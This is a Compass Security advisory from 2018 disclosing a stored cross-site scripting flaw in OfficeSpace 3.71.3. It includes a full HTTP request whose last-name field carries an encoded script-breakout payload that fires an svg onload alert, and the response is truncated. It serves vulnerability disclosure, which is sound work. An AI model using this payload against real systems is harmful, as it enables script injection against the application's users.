############################################################# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ############################################################# # # Product: OfficeSpace [1] # Vendor: OfficeSpace Software Inc. # CSNC ID: CSNC-2018-017 # Subject: Stored Cross-Site Scripting # Risk: High # Effect: Remotely exploitable # Author: Stephan Sekula # Date: 18.04.2018 # ############################################################# Introduction: ------------- The smarter, easier way to manage your space. [1] Compass Security discovered a security flaw in OfficeSpace, which allows injecting client-side code into the application. Affected: --------- Vulnerable: * Version 3.71.3 Technical Description --------------------- Users are able to edit, for example, their names via the software. Manipulating the parameter in the respective requests will lead to the manipulated contents being included in the resulting response. Note that other parameters, such as floor[label], when editing a floor name, are also vulnerable. Request: POST /users/30-csnc-csnc-placement-bottom-svg-onload-alert-1 HTTP/1.1 Host: [CUT].officespacesoftware.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: _huddle_session=[CUT] Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 258 utf8=%E2%9C%93&_method=patch&authenticity_token=[CUT]%5B email%5D=stephan.sekula%40compass-security.com&user%5Brole%5D=admin& user%5Bfirst_name%5D=CSNC&user%5Blast_name%5D=CSNC%22%2Cplacement%3A%27bottom %27%7D%29%3B%24%28%27%3Csvg+onload%3Dalert%281%29%3E%27%29%3B%7D%29%3B%3C %2Fscript%3E%3C%21--&user%5Binitials%5D=CSNC&user%5Btime_zone%5D=UTC& commit=Save+User [CUT] Response: HTTP/1.1 200 OK Date: Wed, 18 Apr 2018 05:02:17 GMT X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Content-Type: text/html; charset=utf-8 Cache-Control: max-age=0, private, must-revalidate Strict-Transport-Security: max-age=15552000; includeSubDomains Set-Cookie: _huddle_session=[CUT]; path=/; secure; HttpOnly Vary: Accept-Encoding Content-Length: 19512 Connection: close OfficeSpace Software [CUT] [CUT]